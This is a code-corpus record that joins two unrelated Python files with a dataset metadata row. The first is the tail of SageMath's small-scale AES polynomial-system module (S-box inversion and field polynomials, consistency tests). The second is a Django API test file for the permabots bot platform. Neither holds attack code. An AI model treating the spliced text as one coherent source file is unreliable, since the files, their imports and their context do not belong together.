w7*x3 + w7*x2 + w7*x1 + w7*x0 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w6*x1 + w6*x0 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w5*x2 + w5*x1 + w5*x0 + w4*x7 + w4*x6 + w4*x5 + w4*x4 \
+ w4*x3 + w4*x2 + w4*x0 + w3*x7 + w3*x6 + w3*x5 + w3*x4 + w3*x2 + w3 + w2*x7 + w2*x6 + w2*x4 + w1*x6 + w1*x1 + w0*x3,
w7*x7 + w7*x6 + w7*x5 + w7*x3 + w7*x2 + w7*x1 + w6*x7 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w5*x7 + w5*x6 + w5*x5 + w5*x3 + w5*x0 + w4*x7 + w4*x5 + w4*x2 + w4*x1 + w3*x7 + w3*x4 \
+ w3*x3 + w2*x6 + w2*x5 + w2 + w1*x7 + w1*x0 + w0*x2,
w7*x6 + w7*x5 + w7*x4 + w7*x2 + w7*x1 + w7*x0 + w6*x7 + w6*x6 + w6*x4 + w6*x3 + w6*x2 + w6*x0 + w5*x6 + w5*x5 + w5*x4 + w5*x2 + w4*x7 + w4*x6 + w4*x4 + w4*x1 + w4*x0 + w3*x6 \
+ w3*x3 + w3*x2 + w2*x5 + w2*x4 + w1*x7 + w1*x6 + w1 + w0*x1,
w7*x7 + w7*x6 + w7*x4 + w7*x1 + w6*x6 + w6*x3 + w6*x1 + w6*x0 + w5*x5 + w5*x3 + w5*x2 + w4*x7 + w4*x5 + w4*x4 + w4*x0 + w3*x7 + w3*x6 + w3*x2 + w2*x4 + w1*x6 + w0*x0 + w0]
if not correct_only:
l.append(w7*x6 + w7*x5 + w7*x1 + w6*x7 + w6*x6 + w6*x2 + w5*x7 + w5*x3 + w4*x4 + w3*x5 + w2*x6 + w1*x7 + w0*x0 + 1)
if not biaffine_only:
l.extend([w7**2 + w7*w6 + w7*w3 + w7*w1 + w7*x7 + w7*x6 + w7*x5 + w7*x2 + w7*x1 + w7*x0 + w6**2 + w6*w0 + w6*x6 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w6*x0 + w5**2 + w5*w4 + w5*w3 \
+ w5*w2 + w5*x7 + w5*x5 + w5*x4 + w5*x1 + w5*x0 + w4**2 + w4*w2 + w4*w0 + w4*x5 + w4*x4 + w4*x2 + w3*w2 + w3*x6 + w3*x3 + w3*x1 + w3*x0 + w2*x7 + w2*x5 + w2*x4 \
+ w2*x0 + w1*x4 + w0**2 + w0*x0,
w7*x6 + w7*x4 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x2 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w5*x1 + w4*x5 + w4*x4 + w4*x3 + w4*x1 + w4*x0 + w3*x7 + w3*x5 + w3*x2 \
+ w2*x7 + w2*x6 + w2*x3 + w1*x7 + w1*x6 + w1*x5 + w1*x4 + w1*x2 + w0*x6 + w0*x5 + w0*x4 + w0*x2 + w0*x1 + x7**2 + x7*x6 + x7*x5 + x7*x3 + x7*x1 + x7*x0 + x6*x2 \
+ x6*x1 + x5*x4 + x5*x3 + x5*x2 + x5*x1 + x4*x3 + x4*x2 + x4*x1 + x3**2 + x3*x2 + x2*x1 + x2*x0,
w7*x5 + w7*x4 + w7*x3 + w7*x1 + w7*x0 + w6*x7 + w6*x5 + w6*x2 + w5*x7 + w5*x6 + w5*x3 + w4*x7 + w4*x6 + w4*x5 + w4*x4 + w4*x2 + w3*x6 + w3*x5 + w3*x4 + w3*x2 + w3*x1 \
+ w2*x6 + w2*x3 + w1*x7 + w1*x4 + w0*x7 + w0*x6 + w0*x5 + w0*x3 + x7*x3 + x7*x2 + x6*x5 + x6*x4 + x6*x3 + x6*x2 + x6*x0 + x5*x4 + x5*x3 + x5*x2 + x4**2 + x4*x3 \
+ x3*x2 + x3*x1,
w7*w3 + w7*w2 + w7*x6 + w7*x5 + w7*x4 + w7*x1 + w7*x0 + w6*w5 + w6*w4 + w6*w3 + w6*w2 + w6*w0 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w6*x0 + w5*w4 + w5*w3 + w5*w2 + w5*x7 \
+ w5*x6 + w5*x4 + w5*x3 + w5*x0 + w4**2 + w4*w3 + w4*x7 + w4*x4 + w4*x3 + w4*x1 + w3*w2 + w3*w1 + w3*x7 + w3*x5 + w3*x2 + w3*x0 + w2*x6 + w2*x4 + w2*x3 + w1*x7 \
+ w1*x3 + w0*x7,
w7*x5 + w7*x2 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x2 + w6*x1 + w5*x5 + w5*x3 + w5*x2 + w4*x3 + w4*x2 + w4*x1 + w3*x6 + w3*x3 + w3*x2 + w3*x0 + w2*x7 + w2*x6 \
+ w2*x5 + w2*x3 + w2*x2 + w1*x6 + w1*x4 + w1*x3 + w0*x4 + w0*x3 + w0*x2 + x7*x5 + x7*x4 + x7*x1 + x7*x0 + x6*x0 + x5**2 + x5*x2 + x5*x1 + x5*x0 + x4**2 + x4*x0 \
+ x3*x2 + x3*x0 + x1**2,
w7*w6 + w7*w5 + w7*w4 + w7*w3 + w7*x7 + w7*x5 + w7*x4 + w7*x3 + w7*x0 + w6**2 + w6*w5 + w6*w4 + w6*w2 + w6*w1 + w6*w0 + w6*x7 + w6*x4 + w6*x3 + w6*x2 + w6*x1 + w5*w4 \
+ w5*w1 + w5*w0 + w5*x7 + w5*x6 + w5*x5 + w5*x3 + w5*x2 + w4*w2 + w4*w1 + w4*x7 + w4*x6 + w4*x3 + w4*x2 + w4*x0 + w3*w0 + w3*x7 + w3*x6 + w3*x4 + w3*x1 + w2**2 \
+ w2*x5 + w2*x3 + w2*x2 + w1*x7 + w1*x6 + w1*x2 + w0*x6,
w7*w5 + w7*w4 + w7*w1 + w7*w0 + w7*x6 + w7*x2 + w6*w0 + w6*x6 + w6*x3 + w6*x2 + w6*x1 + w5**2 + w5*w2 + w5*w1 + w5*w0 + w5*x7 + w5*x6 + w5*x5 + w5*x2 + w4**2 + w4*w0 \
+ w4*x6 + w4*x1 + w4*x0 + w3*w2 + w3*w0 + w3*x5 + w3*x4 + w3*x3 + w3*x2 + w3*x1 + w3*x0 + w2*x7 + w2*x6 + w2*x5 + w2*x4 + w2*x3 + w2*x2 + w2*x0 + w1**2 + w1*x7 \
+ w1*x6 + w1*x4 + w0*x3,
w7*x7 + w7*x6 + w7*x5 + w7*x2 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w5*x5 + w5*x4 + w5*x3 + w5*x1 + w5*x0 + w4*x7 + w4*x5 + w4*x2 + w3*x7 + w3*x6 + w3*x3 \
+ w2*x7 + w2*x6 + w2*x5 + w2*x4 + w2*x2 + w1*x6 + w1*x5 + w1*x4 + w1*x2 + w1*x1 + w0*x6 + w0*x3 + x7**2 + x7*x5 + x7*x3 + x6**2 + x6*x5 + x6*x2 + x6*x0 + x5**2 \
+ x4**2 + x4*x3 + x4*x2 + x4*x1 + x3**2 + x3*x1 + x2*x1,
w7**2 + w7*w6 + w7*w5 + w7*w3 + w7*w1 + w7*w0 + w7*x6 + w7*x5 + w7*x3 + w7*x2 + w7*x1 + w6*w2 + w6*w1 + w6*x7 + w6*x6 + w6*x5 + w6*x2 + w6*x1 + w6*x0 + w5*w4 + w5*w3 \
+ w5*w2 + w5*w1 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w5*x1 + w5*x0 + w4*w3 + w4*w2 + w4*w1 + w4*x7 + w4*x5 + w4*x4 + w4*x1 + w4*x0 + w3**2 + w3*w2 + w3*x5 + w3*x4 \
+ w3*x2 + w2*w1 + w2*w0 + w2*x6 + w2*x3 + w2*x1 + w2*x0 + w1*x7 + w1*x5 + w1*x4 + w1*x0 + w0*x4,
w7*x7 + w7*x5 + w7*x2 + w6*x7 + w6*x6 + w6*x3 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x2 + w4*x6 + w4*x5 + w4*x4 + w4*x2 + w4*x1 + w3*x6 + w3*x3 + w2*x7 + w2*x4 + w1*x7 \
+ w1*x6 + w1*x5 + w1*x3 + w0*x7 + w0*x6 + w0*x5 + w0*x3 + w0*x2 + w0*x0 + x7**2 + x7*x6 + x7*x3 + x7*x1 + x6**2 + x6*x0 + x5**2 + x5*x4 + x5*x3 + x5*x2 + x4**2 \
+ x4*x2 + x4*x0 + x3*x2 + x0**2,
w7*x7 + w7*x6 + w7*x5 + w7*x4 + w7*x3 + w7*x1 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w6*x0 + w5*x7 + w5*x5 + w5*x2 + w4*x7 + w4*x6 + w4*x3 + w3*x7 + w3*x6 + w3*x5 + w3*x4 \
+ w3*x2 + w2*x6 + w2*x5 + w2*x4 + w2*x2 + w2*x1 + w1*x6 + w1*x3 + w0*x7 + w0*x4 + x7*x6 + x7*x5 + x7*x4 + x7*x3 + x6**2 + x6*x5 + x6*x4 + x6*x2 + x6*x1 + x6*x0 \
+ x5*x4 + x5*x1 + x5*x0 + x4*x2 + x4*x1 + x3*x0 + x2**2,
w7*x5 + w7*x4 + w7*x3 + w7*x2 + w6*x7 + w6*x1 + w5*x5 + w5*x4 + w5*x3 + w5*x2 + w5*x1 + w4*x7 + w4*x6 + w4*x4 + w4*x3 + w3*x6 + w3*x5 + w3*x4 + w3*x3 + w2*x2 + w2*x0 \
+ w1*x6 + w1*x5 + w1*x4 + w1*x3 + w1*x2 + w0*x7 + w0*x5 + w0*x4 + x7**2 + x7*x4 + x7*x2 + x6*x4 + x6*x3 + x6*x2 + x6*x1 + x5**2 + x5*x4 + x5*x3 + x5*x2 + x5*x0 \
+ x4*x3 + x4*x2 + x4*x1 + x3**2 + x2*x0 + x1*x0,
w7*x6 + w7*x5 + w7*x3 + w7*x2 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w5*x7 + w5*x1 + w4*x5 + w4*x4 + w4*x3 + w4*x2 + w4*x1 + w3*x7 + w3*x6 + w3*x4 + w3*x3 + w2*x6 + w2*x5 \
+ w2*x4 + w2*x3 + w1*x2 + w1*x0 + w0*x6 + w0*x5 + w0*x4 + w0*x3 + w0*x2 + x7*x5 + x7*x2 + x7*x0 + x6**2 + x6*x5 + x6*x2 + x6*x1 + x6*x0 + x5**2 + x5*x4 + x4**2 \
+ x4*x2 + x4*x1 + x4*x0 + x3**2 + x3*x2 + x1*x0,
w7**2 + w7*w5 + w7*w3 + w7*x7 + w7*x6 + w7*x4 + w7*x3 + w7*x2 + w6**2 + w6*w5 + w6*w2 + w6*w0 + w6*x7 + w6*x6 + w6*x3 + w6*x2 + w6*x1 + w6*x0 + w5**2 + w5*x7 + w5*x6 \
+ w5*x5 + w5*x4 + w5*x2 + w5*x1 + w4**2 + w4*w3 + w4*w2 + w4*w1 + w4*x6 + w4*x5 + w4*x2 + w4*x1 + w3**2 + w3*w1 + w3*x6 + w3*x5 + w3*x3 + w3*x0 + w2*w1 + w2*x7 \
+ w2*x4 + w2*x2 + w2*x1 + w1*x6 + w1*x5 + w1*x1 + w0*x5,
w7*w5 + w7*w2 + w7*w0 + w7*x5 + w7*x3 + w6**2 + w6*w5 + w6*w2 + w6*w1 + w6*w0 + w6*x7 + w6*x3 + w6*x2 + w6*x0 + w5**2 + w5*w4 + w5*x7 + w5*x6 + w5*x4 + w5*x2 + w5*x0 \
+ w4**2 + w4*w2 + w4*w1 + w4*w0 + w4*x6 + w4*x4 + w4*x3 + w4*x2 + w4*x0 + w3**2 + w3*w2 + w3*x7 + w3*x6 + w3*x4 + w3*x3 + w3*x2 + w3*x0 + w2*x7 + w2*x6 + w2*x4 \
+ w2*x1 + w2*x0 + w1*w0 + w1*x5 + w1*x4 + w0*x1,
w7**2 + w7*w4 + w7*w2 + w7*x6 + w7*x4 + w7*x0 + w6*w4 + w6*w3 + w6*w2 + w6*w1 + w6*x4 + w6*x3 + w6*x1 + w5**2 + w5*w4 + w5*w3 + w5*w2 + w5*w0 + w5*x7 + w5*x5 + w5*x3 \
+ w5*x1 + w5*x0 + w4*w3 + w4*w2 + w4*w1 + w4*x7 + w4*x5 + w4*x4 + w4*x3 + w4*x1 + w4*x0 + w3**2 + w3*x7 + w3*x5 + w3*x4 + w3*x3 + w3*x1 + w2*w0 + w2*x7 + w2*x5 \
+ w2*x2 + w2*x1 + w1*w0 + w1*x6 + w1*x5 + w0*x2])
return l
def _inversion_polynomials_single_sbox(self, x= None, w=None, biaffine_only=None, correct_only=None):
"""
Generate inversion polynomials of a single S-box.
INPUT:
- ``x`` - output variables (default: ``None``)
- ``w`` - input variables (default: ``None``)
- ``biaffine_only`` - only include biaffine polynomials (default: object default)
- ``correct_only`` - only include correct polynomials (default: object default)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: len(sr._inversion_polynomials_single_sbox())
24
sage: len(sr._inversion_polynomials_single_sbox(correct_only=True))
23
sage: len(sr._inversion_polynomials_single_sbox(biaffine_only=False))
40
sage: len(sr._inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
39
"""
e = self.e
if biaffine_only is None:
biaffine_only = self._biaffine_only
if correct_only is None:
correct_only = self._correct_only
if x is None and w is None:
# make sure it prints like in the book.
names = ["w%d" % i for i in reversed(range(e))] + ["x%d"%i for i in reversed(range(e))]
P = PolynomialRing(GF(2), e*2, names, order='lex')
x = Matrix(P, e, 1, P.gens()[e:])
w = Matrix(P, e, 1, P.gens()[:e])
else:
if isinstance(x, (tuple, list)):
P = x[0].parent()
elif is_Matrix(x):
P = x.base_ring()
else:
raise TypeError("x not understood")
if isinstance(x, (tuple, list)):
x = Matrix(P, e, 1, x)
if isinstance(w, (tuple, list)):
w = Matrix(P, e, 1, w)
T = self._mul_matrix(self.k.gen())
o = Matrix(P, e, 1, [0]*(e-1) + [1])
columns = []
for i in reversed(range(e)):
columns.append((T**i * w).list())
Cw = Matrix(P, e, e, columns).transpose()
columns = []
for i in reversed(range(e)):
columns.append((T**i * x).list())
Cx = Matrix(P, e, e, columns).transpose()
S = self._square_matrix()
l = []
if correct_only:
l.append( (Cw * x + o).list()[:-1] )
else:
l.append( (Cw * x + o).list() )
l.append( (Cw * S *x + x).list() )
l.append( (Cx * S *w + w).list() )
if not biaffine_only:
l.append( ((Cw * S**2 + Cx*S)*x).list() )
l.append( ((Cx * S**2 + Cw*S)*w).list() )
return sum(l, [])
def inversion_polynomials(self, xi, wi, length):
"""
Return polynomials to represent the inversion in the AES S-Box.
INPUT:
- ``xi`` - output variables
- ``wi`` - input variables
- ``length`` - length of both lists
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: xi = sr.vars('x', 1)
sage: wi = sr.vars('w', 1)
sage: sr.inversion_polynomials(xi, wi, len(xi))[:3]
[x100*w100 + x100*w102 + x100*w103 + x100*w107 + x101*w101 + x101*w102 + x101*w106 + x102*w100 + x102*w101 + x102*w105 + x103*w100 + x103*w104 + x104*w103 + x105*w102 + x106*w101 + x107*w100,
x100*w101 + x100*w103 + x100*w104 + x101*w100 + x101*w102 + x101*w103 + x101*w107 + x102*w101 + x102*w102 + x102*w106 + x103*w100 + x103*w101 + x103*w105 + x104*w100 + x104*w104 + x105*w103 + x106*w102 + x107*w101,
x100*w102 + x100*w104 + x100*w105 + x101*w101 + x101*w103 + x101*w104 + x102*w100 + x102*w102 + x102*w103 + x102*w107 + x103*w101 + x103*w102 + x103*w106 + x104*w100 + x104*w101 + x104*w105 + x105*w100 + x105*w104 + x106*w103 + x107*w102]
"""
if is_Matrix(xi):
xi = xi.list()
if is_Matrix(wi):
wi = wi.list()
e = self.e
l = []
for j in range(0, length, e):
l += self.inversion_polynomials_single_sbox(xi[j:j+e], wi[j:j+e])
return l
def field_polynomials(self, name, i, l=None):
"""
Return list of field polynomials for a given round ``i`` and
name ``name``.
INPUT:
- ``name`` - variable name
- ``i`` - round number
- ``l`` - length of variable list (default: ``None`` = r\*c)
EXAMPLES::
sage: sr = mq.SR(3, 1, 1, 8, gf2=True, polybori=False)
sage: sr.field_polynomials('x', 2)
[x200^2 + x200, x201^2 + x201,
x202^2 + x202, x203^2 + x203,
x204^2 + x204, x205^2 + x205,
x206^2 + x206, x207^2 + x207]
::
sage: sr = mq.SR(3, 1, 1, 8, gf2=True, polybori=True)
sage: sr.field_polynomials('x', 2)
[]
"""
r = self._r
c = self._c
e = self._e
n = self._n
if l is None:
l = r*c
if self._polybori:
return []
_vars = self.vars(name, i, l, e)
return [_vars[e*j+i]**2 - _vars[e*j+i] for j in range(l) for i in range(e)]
class SR_gf2_2(SR_gf2):
"""
This is an example how to customize the SR constructor.
In this example, we replace the S-Box inversion polynomials by the
polynomials generated by the S-Box class.
"""
def inversion_polynomials_single_sbox(self, x=None, w=None, biaffine_only=None, correct_only=None, groebner=False):
"""
Return inversion polynomials of a single S-Box.
INPUT:
- ``x`` - output variables (default: ``None``)
- ``w`` - input variables (default: ``None``)
- ``biaffine_only`` - ignored (always ``False``)
- ``correct_only`` - ignored (always ``True``)
- ``groebner`` - precompute the Groebner basis for this S-Box (default: ``False``).
EXAMPLES::
sage: from sage.crypto.mq.sr import SR_gf2_2
sage: e = 4
sage: sr = SR_gf2_2(1, 1, 1, e)
sage: P = PolynomialRing(GF(2),['x%d'%i for i in range(e)] + ['w%d'%i for i in range(e)],order='lex')
sage: X,W = P.gens()[:e],P.gens()[e:]
sage: sr.inversion_polynomials_single_sbox(X, W, groebner=True)
[x0 + w0*w1*w2 + w0*w1 + w0*w2 + w0*w3 + w0 + w1 + w2,
x1 + w0*w1*w3 + w0*w3 + w0 + w1*w3 + w1 + w2*w3,
x2 + w0*w2*w3 + w0*w2 + w0 + w1*w2 + w1*w3 + w2*w3,
x3 + w0*w1*w2 + w0 + w1*w2*w3 + w1*w2 + w1*w3 + w1 + w2 + w3]
sage: from sage.crypto.mq.sr import SR_gf2_2
sage: e = 4
sage: sr = SR_gf2_2(1, 1, 1, e)
sage: sr.inversion_polynomials_single_sbox()
[w3*w1 + w3*w0 + w3*x2 + w3*x1 + w3 + w2*w1 + w1 + x3 + x2 + x1,
w3*w2 + w3*w1 + w3*x3 + w2 + w1 + x3,
w3*w2 + w3*w1 + w3*x2 + w3 + w2*x3 + x2 + x1,
w3*w2 + w3*w1 + w3*x3 + w3*x2 + w3*x1 + w3 + w2*x2 + w0 + x3 + x2 + x1 + x0,
w3*w2 + w3*w1 + w3*x1 + w3*x0 + w2*x1 + w0 + x3 + x0,
w3*w2 + w3*w1 + w3*w0 + w3*x2 + w3*x1 + w2*w0 + w2*x0 + w0 + x3 + x2 + x1 + x0,
w3*w2 + w3*x1 + w3 + w2*w0 + w1*w0 + w1 + x3 + x2,
w3*w2 + w3*w1 + w3*x1 + w1*x3 + x3 + x2 + x1,
w3*x3 + w3*x2 + w3*x0 + w3 + w1*x2 + w1 + w0 + x2 + x0,
w3*w2 + w3*w1 + w3*x2 + w3*x1 + w1*x1 + w1 + w0 + x2 + x0,
w3*w2 + w3*w1 + w3*w0 + w3*x3 + w3*x1 + w2*w0 + w1*x0 + x3 + x2,
w3*w2 + w3*w1 + w3*x2 + w3*x1 + w3*x0 + w3 + w1 + w0*x3 + x3 + x2,
w3*w2 + w3*w1 + w3*w0 + w3*x3 + w3 + w2*w0 + w1 + w0*x2 + x3 + x2,
w3*w0 + w3*x2 + w2*w0 + w0*x1 + w0 + x3 + x1 + x0,
w3*w0 + w3*x3 + w3*x0 + w2*w0 + w1 + w0*x0 + w0 + x3 + x2,
w3*w2 + w3 + w1 + x3*x2 + x3 + x1,
w3*w2 + w3*x3 + w1 + x3*x1 + x3 + x2,
w3*w2 + w3*w0 + w3*x3 + w3*x2 + w3*x1 + w0 + x3*x0 + x1 + x0,
w3*w2 + w3*w1 + w3*w0 + w3*x3 + w1 + w0 + x2*x1 + x2 + x0,
w3*w2 + w2*w0 + w1 + x3 + x2*x0,
w3*x3 + w3*x1 + w2*w0 + w1 + x3 + x2 + x1*x0 + x1]
TESTS:
Note that ``biaffine_only`` and ``correct_only`` are always
ignored. The former is always false while the second is always
true. They are only accepted for compatibility with the base
class.
sage: from sage.crypto.mq.sr import SR_gf2_2
sage: e = 4
sage: sr = SR_gf2_2(1, 1, 1, e)
sage: l = sr.inversion_polynomials_single_sbox()
sage: l == sr.inversion_polynomials_single_sbox(biaffine_only=True, correct_only=False)
True
"""
e = self.e
if x is None and w is None:
# make sure it prints like in the book.
names = ["w%d" % i for i in reversed(range(e))] + ["x%d"%i for i in reversed(range(e))]
P = PolynomialRing(GF(2), e*2, names, order='lex')
x = P.gens()[e:]
w = P.gens()[:e]
S = self.sbox(inversion_only=True)
F = S.polynomials(w, x, degree=e-2, groebner=groebner)
return F
class AllowZeroInversionsContext:
"""
Temporarily allow zero inversion.
"""
def __init__(self, sr):
"""
EXAMPLES::
sage: from sage.crypto.mq.sr import AllowZeroInversionsContext
sage: sr = mq.SR(1,2,2,4)
sage: with AllowZeroInversionsContext(sr):
....: sr.sub_byte(0)
a^2 + a
"""
self.sr = sr
def __enter__(self):
"""
EXAMPLES::
sage: from sage.crypto.mq.sr import AllowZeroInversionsContext
sage: sr = mq.SR(1,2,2,4)
sage: sr.sub_byte(0)
Traceback (most recent call last):
...
ZeroDivisionError: A zero inversion occurred during an encryption or key schedule.
sage: with AllowZeroInversionsContext(sr):
....: sr.sub_byte(0)
a^2 + a
"""
self.allow_zero_inversions = self.sr._allow_zero_inversions
self.sr._allow_zero_inversions = True
def __exit__(self, typ, value, tb):
"""
EXAMPLES::
sage: from sage.crypto.mq.sr import AllowZeroInversionsContext
sage: sr = mq.SR(1,2,2,4)
sage: with AllowZeroInversionsContext(sr):
....: sr.sub_byte(0)
a^2 + a
sage: sr._allow_zero_inversions
False
"""
self.sr._allow_zero_inversions = self.allow_zero_inversions
def test_consistency(max_n=2, **kwargs):
r"""
Test all combinations of ``r``, ``c``, ``e`` and ``n`` in ``(1,
2)`` for consistency of random encryptions and their polynomial
systems. `\GF{2}` and `\GF{2^e}` systems are tested. This test takes
a while.
INPUT:
- ``max_n`` -- maximal number of rounds to consider (default: 2)
- ``kwargs`` -- are passed to the SR constructor
TESTS:
The following test called with ``max_n`` = 2 requires a LOT of RAM
(much more than 2GB). Since this might cause the doctest to fail
on machines with "only" 2GB of RAM, we test ``max_n`` = 1, which
has a more reasonable memory usage. ::
sage: from sage.crypto.mq.sr import test_consistency
sage: test_consistency(1) # long time (65s on sage.math, 2012)
True
"""
consistent = True
for r in (1, 2, 4):
for c in (1, 2, 4):
for e in (4, 8):
for n in range(1, max_n+1):
for gf2 in (True, False):
zero_division = True
while zero_division:
sr = SR(n, r, c, e, gf2=gf2, **kwargs)
try:
F, s = sr.polynomial_system()
F = F.subs(s)
consistent &= (F.groebner_basis()[0] != 1)
if not consistent:
print(str(sr) + " is not consistent")
zero_division = False
except ZeroDivisionError:
pass
return consistent
| 36.37342
| 251
| 0.465806
|
cd70deed1e1d6e6d9b7218557c251e178cd34575
| 22,156
|
py
|
Python
|
tests/api/test_bot.py
|
eafanasev/permabots
|
24de0376e8c482800f4214c021c133d81b9de69f
|
[
"BSD-3-Clause"
] | 81
|
2016-05-18T02:34:10.000Z
|
2021-08-28T17:25:13.000Z
|
tests/api/test_bot.py
|
eafanasev/permabots
|
24de0376e8c482800f4214c021c133d81b9de69f
|
[
"BSD-3-Clause"
] | 15
|
2016-05-27T08:51:46.000Z
|
2021-03-19T21:42:21.000Z
|
tests/api/test_bot.py
|
eafanasev/permabots
|
24de0376e8c482800f4214c021c133d81b9de69f
|
[
"BSD-3-Clause"
] | 34
|
2016-05-29T14:37:01.000Z
|
2022-03-24T17:16:53.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from permabots.models import Bot, TelegramBot, KikBot, MessengerBot
from rest_framework import status
from permabots.views import BotDetail, TelegramBotDetail, KikBotDetail, MessengerBotDetail
import json
from tests.api.base import BaseTestAPI
from unittest import skip
class TestBotAPI(BaseTestAPI):
def assertBot(self, id, created_at, updated_at, name, telegram_bot_token=None, kik_bot_api_key=None, messenger_bot_token=None, bot=None):
if not bot:
bot = self.bot
self.assertEqual(bot.name, name)
if bot.telegram_bot:
self.assertEqual(telegram_bot_token, bot.telegram_bot.token)
if bot.kik_bot:
self.assertEqual(kik_bot_api_key, bot.kik_bot.api_key)
if bot.messenger_bot:
self.assertEqual(messenger_bot_token, bot.messenger_bot.token)
self.assertPermabotsModel(id, created_at, updated_at, bot)
def _bot_list_url(self):
return '%s/bots/' % self.api
def _bot_detail_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/' % (self.api, bot_pk)
def test_get_bots_ok(self):
data = self._test_get_list_ok(self._bot_list_url())
self.assertBot(data[0]['id'], data[0]['created_at'], data[0]['updated_at'], data[0]['name'],
data[0]['telegram_bot']['token'], data[0]['kik_bot']['api_key'], data[0]['messenger_bot']['token'], None)
def test_get_bots_not_auth(self):
self._test_get_list_not_auth(self._bot_list_url())
def test_post_bots_ok(self):
data = self._test_post_list_ok(self._bot_list_url(), Bot, {'name': 'new_name'})
new_bot = Bot.objects.all()[0]
self.assertEqual(new_bot.name, 'new_name')
self.assertBot(data['id'], data['created_at'], data['updated_at'], data['name'], None, None, None, new_bot)
def test_post_bots_not_auth(self):
self._test_post_list_not_auth(self._bot_list_url(), {'name': 'new_name'})
def test_get_bot_ok(self):
data = self._test_get_detail_ok(self._bot_detail_url())
self.assertBot(data['id'], data['created_at'], data['updated_at'], data['name'], data['telegram_bot']['token'], data['kik_bot']['api_key'],
data['messenger_bot']['token'])
def test_get_bot_not_auth(self):
self._test_get_detail_not_auth(self._bot_detail_url())
def test_get_bot_not_found(self):
self._test_get_detail_not_found(self._bot_detail_url(self.unlikely_id))
def test_put_bot_ok(self):
data = self._test_put_detail_ok(self._bot_detail_url(), {'name': 'new_name'}, BotDetail, self.bot.pk)
updated = Bot.objects.get(pk=self.bot.pk)
self.assertEqual(updated.name, 'new_name')
self.assertBot(data['id'], data['created_at'], data['updated_at'], data['name'], data['telegram_bot']['token'],
data['kik_bot']['api_key'], data['messenger_bot']['token'], updated)
def test_put_bot_not_auth(self):
self._test_put_detail_not_auth(self._bot_detail_url(), {'name': 'new_name'}, BotDetail, self.bot.pk)
def test_put_bot_not_found(self):
self._test_put_detail_not_found(self._bot_detail_url(self.unlikely_id), {'name': 'new_name'}, BotDetail, self.unlikely_id)
def test_delete_bot_ok(self):
self._test_delete_detail_ok(self._bot_detail_url(), BotDetail, self.bot.pk)
self.assertEqual(Bot.objects.count(), 0)
def test_delete_bot_not_auth(self):
self._test_delete_detail_not_auth(self._bot_detail_url(), BotDetail, self.bot.pk)
def test_delete_bot_not_found(self):
self._test_delete_detail_not_found(self._bot_detail_url(self.unlikely_id), BotDetail, self.unlikely_id)
class TestTelegramBotAPI(BaseTestAPI):
def assertTelegramBot(self, id, created_at, updated_at, token, enabled, username, first_name, last_name, telegram_bot=None):
if not telegram_bot:
telegram_bot = self.bot.telegram_bot
self.assertEqual(telegram_bot.token, token)
self.assertEqual(telegram_bot.enabled, enabled)
self.assertEqual(telegram_bot.user_api.username, username)
self.assertEqual(telegram_bot.user_api.first_name, first_name)
self.assertEqual(telegram_bot.user_api.last_name, last_name)
self.assertPermabotsModel(id, created_at, updated_at, telegram_bot)
def _telegram_bot_list_url(self, bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
return '%s/bots/%s/telegram/' % (self.api, bot_pk)
def _telegram_bot_detail_url(self, bot_pk=None, telegram_bot_pk=None):
if not bot_pk:
bot_pk = self.bot.pk
if not telegram_bot_pk:
telegram_bot_pk = self.bot.telegram_bot.pk
return '%s/bots/%s/telegram/%s/' % (self.api, bot_pk, telegram_bot_pk)
def test_get_telegram_bots_ok(self):
data = self._test_get_list_ok(self._telegram_bot_list_url())
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'], data['info']['username'],
data['info']['first_name'], data['info']['last_name'], None)
def test_get_telegram_bots_not_auth(self):
self._test_get_list_not_auth(self._telegram_bot_list_url())
def test_telegram_post_bots_ok(self):
data = self._test_post_list_ok(self._telegram_bot_list_url(), TelegramBot, {'token': self.mytoken, 'enabled': 'True'})
new_bot = TelegramBot.objects.get(token=self.mytoken)
self.assertEqual(new_bot.token, self.mytoken)
self.assertTrue(new_bot.enabled)
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'],
data['info']['username'], data['info']['first_name'], data['info']['last_name'], new_bot)
def test_telegram_post_bots_with_no_enabled_field(self):
data = self._test_post_list_ok(self._telegram_bot_list_url(), TelegramBot, {'token': self.mytoken})
new_bot = TelegramBot.objects.get(token=self.mytoken)
self.assertEqual(new_bot.token, self.mytoken)
self.assertTrue(new_bot.enabled)
self.assertTelegramBot(data['id'], data['created_at'], data['updated_at'], data['token'], data['enabled'],
data['info']['username'], data['info']['first_name'], data['info']['last_name'], new_bot)
def test_post_telegram_bots_token_not_valid(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._telegram_bot_list_url(),
data=json.dumps({"token": 'invalidtoken', "enabled": True}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('not a valid token', response.data['token'][0])
self.assertEqual(TelegramBot.objects.count(), 0)
def test_post_telegram_bots_token_not_exists_in_telegram(self):
TelegramBot.objects.all().delete()
response = self.client.post(self._telegram_bot_list_url(),
data=json.dumps({"token": self.mytoken + 'a', "enabled": True}),
content_type='application/json',
HTTP_AUTHORIZATION=self._gen_token(self.bot.owner.auth_token))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
